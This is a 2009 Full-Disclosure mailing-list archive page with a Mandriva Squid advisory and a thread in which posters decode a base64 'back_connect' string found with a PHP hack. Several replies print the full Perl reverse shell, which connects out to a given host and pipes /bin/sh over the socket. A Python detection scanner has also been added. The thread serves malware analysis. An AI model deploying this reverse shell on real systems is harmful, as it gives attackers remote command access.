sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

this has to do with old php 4.x.x version with magic quotes enabled.
i'm just trying to figure out what the connect back code does.

any input is much appreciated.

thx,

sr.

From security at mandriva.com Tue Feb 10 18:14:00 2009
From: security at mandriva.com (security at mandriva.com)
Date: Tue, 10 Feb 2009 19:14:00 +0100
Subject: [Full-disclosure] [ MDVSA-2009:034 ] squid
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:034
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : squid
 Date    : February 10, 2009
 Affected: 2008.1, 2009.0
 _______________________________________________________________________

 Problem Description:

 Due to an internal error Squid is vulnerable to a denial of service
 attack when processing specially crafted requests. This problem allows
 any client to perform a denial of service attack on the Squid service
 (CVE-2009-0478).

 The updated packages have been patched to address this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0478
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.1:
 16a8648b21391a385fb98a691ad05850  2008.1/i586/squid-3.0-1.1mdv2008.1.i586.rpm
 ba61fb27a256c11a53120baf0e32fd94  2008.1/i586/squid-cachemgr-3.0-1.1mdv2008.1.i586.rpm
 02c5602fa6a2bf7b1f97de5050a71af5  2008.1/SRPMS/squid-3.0-1.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 22e84fc5aa771bdf9cf1d1192f94a1bf  2008.1/x86_64/squid-3.0-1.1mdv2008.1.x86_64.rpm
 340964989d6639ce4d1fb4bd089d0a89  2008.1/x86_64/squid-cachemgr-3.0-1.1mdv2008.1.x86_64.rpm
 02c5602fa6a2bf7b1f97de5050a71af5  2008.1/SRPMS/squid-3.0-1.1mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 bf09cfce8db0718009470bff9f680039  2009.0/i586/squid-3.0-8.1mdv2009.0.i586.rpm
 0da7251030b5e0912aaf47937562c288  2009.0/i586/squid-cachemgr-3.0-8.1mdv2009.0.i586.rpm
 64c0b0ac2cf102141ee7a8ad8747e42d  2009.0/SRPMS/squid-3.0-8.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 d698fd6bf0598af3e4cb42f88dd539be  2009.0/x86_64/squid-3.0-8.1mdv2009.0.x86_64.rpm
 874be46833d14b23923150203be90109  2009.0/x86_64/squid-cachemgr-3.0-8.1mdv2009.0.x86_64.rpm
 64c0b0ac2cf102141ee7a8ad8747e42d  2009.0/SRPMS/squid-3.0-8.1mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJkZiwmqjQ0CJFipgRAmuTAJ974JA6q0e//UvXbBSrmBJ5LSP9FgCg1cOQ
OfpIBObBJQgI6D90nrPgjPk=
=0O4c
-----END PGP SIGNATURE-----

From simon at snosoft.com Tue Feb 10 18:35:02 2009
From: simon at snosoft.com (Simon Smith) Date: Tue, 10 Feb 2009 13:35:02 -0500 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> Message-ID: <8B4D8A29-4382-464A-9F9F-8D7462840B24@snosoft.com> Can you send me the entire package, I'm interested in whatever it is that was uploaded to your box. On Feb 10, 2009, at 1:23 PM, sr. wrote: > can anyone tell me what encoding this is? > > $ > back_connect > = > "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > this has to do with old php 4.x.x version with magic quotes enabled. > i'm just trying to figure out what the connect back code does. > > any input is much appreciated. > > thx, > > sr. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ Simon Smith simon at snosoft.com -------------------------------------- Subscribe to our blog http://snosoft.blogspot.com From simon at snosoft.com Tue Feb 10 18:34:22 2009 
From: simon at snosoft.com (Simon Smith)
Date: Tue, 10 Feb 2009 13:34:22 -0500
Subject: [Full-disclosure] connect back PHP hack
In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
Message-ID: <6489C194-A627-438F-B280-E2B2FF4D14F6@snosoft.com>

its base64..

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname - a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

On Feb 10, 2009, at 1:23 PM, sr. wrote:

> can anyone tell me what encoding this is?
>
> $
> back_connect
> =
> "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
>
> this has to do with old php 4.x.x version with magic quotes enabled.
> i'm just trying to figure out what the connect back code does.
>
> any input is much appreciated.
>
> thx,
>
> sr.
> > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ Simon Smith simon at snosoft.com -------------------------------------- Subscribe to our blog http://snosoft.blogspot.com From razishaban at gmail.com Tue Feb 10 18:44:03 2009 
From: razishaban at gmail.com (Razi Shaban) Date: Tue, 10 Feb 2009 20:44:03 +0200 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> Message-ID: <2d792fb20902101044n6b6dd593r14747fc539c0799c@mail.gmail.com> On Tue, Feb 10, 2009 at 8:23 PM, sr. wrote: > can anyone tell me what encoding this is? > > $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > this has to do with old php 4.x.x version with magic quotes enabled. > i'm just trying to figure out what the connect back code does. > > any input is much appreciated. > > thx, > > sr. > Base64, the "==" at the end gives it away. 
It decrypts to:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

--

Regards,
Razi Shaban

From simon at snosoft.com Tue Feb 10 18:51:49 2009
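For anyone triaging a web root after finding a string like the one in this thread, here is an added Python example (not from any poster) that pulls long base64 literals out of PHP source, strips the whitespace that mail or editor wrapping inserts into the blob (the one quoted in this thread has spaces mid-string for exactly that reason), decodes each strictly, and scores the result against the indicators visible in the decoded script above: socket setup, an outbound connect, stdio redirected onto the socket, and a shell. The PHP file and the Perl fragment inside it are constructed for the example; `scan_php`, `INDICATORS` and the verdict thresholds are this example's own choices.

```python
import base64
import binascii
import re
import string
from typing import Dict, List, Optional

# A quoted PHP string made of base64 alphabet characters, 40 or more of them,
# with whitespace tolerated between them so blobs wrapped across lines still match.
B64_LITERAL = re.compile(r'["\']((?:[A-Za-z0-9+/]\s*){40,}={0,2})["\']')

# Strings whose presence in the decoded text points at a connect-back shell.
INDICATORS: Dict[str, str] = {
    "use Socket": "Perl socket module loaded",
    "sockaddr_in": "remote address built from host/port",
    "connect(": "outbound TCP connection",
    'open(STDIN, ">&': "stdio redirected onto the socket",
    "/bin/sh": "shell spawned",
    "system(": "command execution",
}
PRINTABLE = set(string.printable.encode())


def decode_wrapped_base64(blob: str) -> Optional[bytes]:
    """Strip wrapping whitespace, then decode strictly; None if not base64."""
    compact = re.sub(r"\s+", "", blob)
    try:
        return base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None


def looks_textual(data: bytes) -> bool:
    # Decoded script source is almost entirely printable ASCII.
    return bool(data) and sum(b in PRINTABLE for b in data) / len(data) > 0.95


def verdict(hits: List[str]) -> str:
    if len(hits) >= 3:
        return "connect-back"
    return "review" if hits else "benign"


def scan_php(source: str) -> List[dict]:
    """Return one finding per base64 literal that decodes to text."""
    findings = []
    for m in B64_LITERAL.finditer(source):
        decoded = decode_wrapped_base64(m.group(1))
        if decoded is None or not looks_textual(decoded):
            continue
        text = decoded.decode("ascii", errors="replace")
        hits = [why for needle, why in INDICATORS.items() if needle in text]
        findings.append({
            "offset": m.start(),
            "first_line": text.splitlines()[0],
            "indicators": hits,
            "verdict": verdict(hits),
        })
    return findings


# Constructed Perl fragment carrying the indicator strings (not a working tool).
CONSTRUCTED_PAYLOAD = (
    "#!/usr/bin/perl\n"
    "use Socket;\n"
    "$paddr = sockaddr_in($port, $iaddr);\n"
    "connect(SOCKET, $paddr) || die;\n"
    'open(STDIN, ">&SOCKET");\n'
    "system('/bin/sh');\n"
)


def wrap(text: str, width: int = 76) -> str:
    # Mimics the line wrapping that mail clients apply to long string literals.
    return "\n".join(text[i:i + width] for i in range(0, len(text), width))


def constructed_sample() -> str:
    """A constructed PHP file: one harmless base64 string, one wrapped payload."""
    harmless = base64.b64encode(b"site logo alt text, nothing to see here").decode()
    blob = wrap(base64.b64encode(CONSTRUCTED_PAYLOAD.encode()).decode())
    return (
        "<?php\n"
        f'$alt = "{harmless}";\n'
        f'$back_connect = "{blob}";\n'
        "echo $alt;\n"
    )


if __name__ == "__main__":
    for f in scan_php(constructed_sample()):
        print(f"offset {f['offset']:4d} {f['verdict']:12s} {f['first_line']!r}")
        for why in f["indicators"]:
            print("   -", why)
```

Strict decoding (`validate=True`) is what makes the whitespace stripping necessary and also what keeps the scanner from "decoding" ordinary long strings into garbage; the printable-ratio check discards the remaining false positives such as embedded images, so only literals that decode to source text are scored.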
From: simon at snosoft.com (Simon Smith) Date: Tue, 10 Feb 2009 13:51:49 -0500 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <2d792fb20902101044n6b6dd593r14747fc539c0799c@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> <2d792fb20902101044n6b6dd593r14747fc539c0799c@mail.gmail.com> Message-ID: <19801AE5-00A1-4DA8-A017-7988781E9149@snosoft.com> Technically it doesn't decrypt to anything, it decodes. :) On Feb 10, 2009, at 1:44 PM, Razi Shaban wrote: > On Tue, Feb 10, 2009 at 8:23 PM, sr. wrote: >> can anyone tell me what encoding this is? >> >> $ >> back_connect >> = >> "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj >> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR >> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT >> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI >> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi >> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl >> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; >> >> this has to do with old php 4.x.x version with magic quotes enabled. >> i'm just trying to figure out what the connect back code does. >> >> any input is much appreciated. >> >> thx, >> >> sr. >> > > Base64, the "==" at the end gives it away. 
It decrypts to: > > #!/usr/bin/perl > use Socket; > $cmd= "lynx"; > $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; > $0=$cmd; > $target=$ARGV[0]; > $port=$ARGV[1]; > $iaddr=inet_aton($target) || die("Error: $!\n"); > $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); > $proto=getprotobyname('tcp'); > socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); > connect(SOCKET, $paddr) || die("Error: $!\n"); > open(STDIN, ">&SOCKET"); > open(STDOUT, ">&SOCKET"); > open(STDERR, ">&SOCKET"); > system($system); > close(STDIN); > close(STDOUT); > close(STDERR); > > -- > > Regards, > Razi Shaban > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ Simon Smith simon at snosoft.com -------------------------------------- Subscribe to our blog http://snosoft.blogspot.com From razishaban at gmail.com Tue Feb 10 18:58:08 2009 
From: razishaban at gmail.com (Razi Shaban)
Date: Tue, 10 Feb 2009 20:58:08 +0200
Subject: [Full-disclosure] connect back PHP hack
In-Reply-To: <19801AE5-00A1-4DA8-A017-7988781E9149@snosoft.com>
References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> <2d792fb20902101044n6b6dd593r14747fc539c0799c@mail.gmail.com> <19801AE5-00A1-4DA8-A017-7988781E9149@snosoft.com>
Message-ID: <2d792fb20902101058ic836801h236e5a5a286cfb72@mail.gmail.com>

On Tue, Feb 10, 2009 at 8:51 PM, Simon Smith wrote:
> Technically it doesn't decrypt to anything, it decodes. :)
>
>

According to the Federal Standard 1037C, the National Information Systems Security Glossary, and the Department of Defense Dictionary of Military and Associated Terms:

"In telecommunications, the term decrypt has the following meanings:
1. [A] generic term encompassing decode and decipher.
2. To convert encrypted text into its equivalent plaintext by means of a cryptosystem."

So no, I mean decrypt.

Regards,
Razi Shaban

From w3bd3vil at gmail.com Tue Feb 10 18:54:15 2009
From: w3bd3vil at gmail.com (webDEViL) Date: Wed, 11 Feb 2009 00:24:15 +0530 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <2d792fb20902101044n6b6dd593r14747fc539c0799c@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> <2d792fb20902101044n6b6dd593r14747fc539c0799c@mail.gmail.com> Message-ID: <8656dcd50902101054i29f9955bydcbda607e013a8f5@mail.gmail.com> Must be off the r57 php shell. Regards, webDEViL On Wed, Feb 11, 2009 at 12:14 AM, Razi Shaban wrote: > On Tue, Feb 10, 2009 at 8:23 PM, sr. wrote: > > can anyone tell me what encoding this is? > > > > > $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > > > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > > > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > > > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > > > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > > > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > > > this has to do with old php 4.x.x version with magic quotes enabled. > > i'm just trying to figure out what the connect back code does. > > > > any input is much appreciated. > > > > thx, > > > > sr. > > > > Base64, the "==" at the end gives it away. 
> It decrypts to:
>
> #!/usr/bin/perl
> use Socket;
> $cmd= "lynx";
> $system= 'echo "`uname -a`";echo "`id`";/bin/sh';
> $0=$cmd;
> $target=$ARGV[0];
> $port=$ARGV[1];
> $iaddr=inet_aton($target) || die("Error: $!\n");
> $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
> $proto=getprotobyname('tcp');
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> open(STDIN, ">&SOCKET");
> open(STDOUT, ">&SOCKET");
> open(STDERR, ">&SOCKET");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
>
> --
>
> Regards,
> Razi Shaban
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From ricky at rzhou.org Tue Feb 10 18:36:47 2009
From: ricky at rzhou.org (Ricky Zhou)
Date: Tue, 10 Feb 2009 13:36:47 -0500
Subject: [Full-disclosure] [SPAM] Re: connect back PHP hack
In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
Message-ID: <20090210183647.GF25767@sphe.res.cmu.edu>

On 2009-02-10 01:23:46 PM, sr. wrote:
> can anyone tell me what encoding this is?
>
> this has to do with old php 4.x.x version with magic quotes enabled.
> i'm just trying to figure out what the connect back code does.

It is base64 encoded. If you google base64 decode, you can find some tools for decoding it.

Thanks,
Ricky

From simon at snosoft.com Tue Feb 10 19:05:49 2009
From: simon at snosoft.com (Simon Smith)
Date: Tue, 10 Feb 2009 14:05:49 -0500
Subject: [Full-disclosure] connect back PHP hack
In-Reply-To: <2d792fb20902101058ic836801h236e5a5a286cfb72@mail.gmail.com>
References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> <2d792fb20902101044n6b6dd593r14747fc539c0799c@mail.gmail.com> <19801AE5-00A1-4DA8-A017-7988781E9149@snosoft.com> <2d792fb20902101058ic836801h236e5a5a286cfb72@mail.gmail.com>
Message-ID: <69963D7C-3D6D-48EA-9F81-580E0AF0608B@snosoft.com>

Damn you! I hate being wrong! I'm going to go stand in my corner and pout now.

On Feb 10, 2009, at 1:58 PM, Razi Shaban wrote:
> On Tue, Feb 10, 2009 at 8:51 PM, Simon Smith wrote:
>> Technically it doesn't decrypt to anything, it decodes. :)
>>
>
> According to the Federal Standard 1037C, the National Information
> Systems Security Glossary, and the Department of Defense Dictionary of
> Military and Associated Terms:
>
> "In telecommunications, the term decrypt has the following meanings:
>
> 1. [A] generic term encompassing decode and decipher.
>
> 2. To convert encrypted text into its equivalent plaintext by means of
> a cryptosystem."
>
> So no, I mean decrypt.
>
> Regards,
> Razi Shaban

Simon Smith
simon at snosoft.com
--------------------------------------
Subscribe to our blog
http://snosoft.blogspot.com

From anastasiosm at gmail.com Tue Feb 10 19:23:56 2009
From: anastasiosm at gmail.com (Anastasios Monachos)
Date: Tue, 10 Feb 2009 19:23:56 +0000
Subject: [Full-disclosure] connect back PHP hack
In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
Message-ID: <8d90bdd80902101123n79c9164cr59940b424795285a@mail.gmail.com>

It looks like base64, the decoded output is:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Tasos

2009/2/10 sr.
> can anyone tell me what encoding this is?
>
> this has to do with old php 4.x.x version with magic quotes enabled.
> i'm just trying to figure out what the connect back code does.
>
> any input is much appreciated.
>
> thx,
>
> sr.

--
AM

From gcastrop at gmail.com Tue Feb 10 19:10:53 2009
From: gcastrop at gmail.com (Gustavo Castro)
Date: Tue, 10 Feb 2009 17:10:53 -0200
Subject: [Full-disclosure] connect back PHP hack
In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
Message-ID:

"Sr."

This is base64 encoded.

2009/2/10 sr. :
> can anyone tell me what encoding this is?
>
> this has to do with old php 4.x.x version with magic quotes enabled.
> i'm just trying to figure out what the connect back code does.
>
> any input is much appreciated.
>
> thx,
>
> sr.

--
Regards,
Gustavo Castro Puig.
E-Mail: gcastrop at gmail.com

LPI Level-1 Certified (https://www.lpi.org/es/verify.html
LPID:LPI000042304 Verification Code: hp6re8w5qg )
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GCS/CM/IT/ED dx s-:- a? C(+++)$ UL++++*$ P+ L++++(++)$ E--- W+++$ N+ o?
K- w O M V-- PS PE++(-) Y-(+) PGP+ t(++) 5+ X++ R tv+ b++(++++) DI+++
D++ G++ e++ h--- r y+++
------END GEEK CODE BLOCK------
Registered Linux User #69342

From ilaiy.e at gmail.com Tue Feb 10 19:22:03 2009
From: ilaiy.e at gmail.com (ilaiy)
Date: Tue, 10 Feb 2009 11:22:03 -0800
Subject: [Full-disclosure] connect back PHP hack
In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
Message-ID: <849b9b760902101122p6e0b6ad2q9f24617f55fd1a89@mail.gmail.com>

Here you go

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Ilaiy

On Tue, Feb 10, 2009 at 10:23 AM, sr. wrote:
> can anyone tell me what encoding this is?
>
> this has to do with old php 4.x.x version with magic quotes enabled.
> i'm just trying to figure out what the connect back code does.
>
> any input is much appreciated.
>
> thx,
>
> sr.

From staticrez at gmail.com Tue Feb 10 19:34:37 2009
From: staticrez at gmail.com (sr.)
Date: Tue, 10 Feb 2009 14:34:37 -0500
Subject: [Full-disclosure] connect back PHP hack
In-Reply-To:
References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
Message-ID: <5d80962a0902101134m4c42b9f1lfc59617054b830b7@mail.gmail.com>

i really appreciate all of the responses. this is what community is all about. i'd seen the "==" in other encoding schemes, but just wasn't sure and wanted a quick response...thanks to everyone who responded!

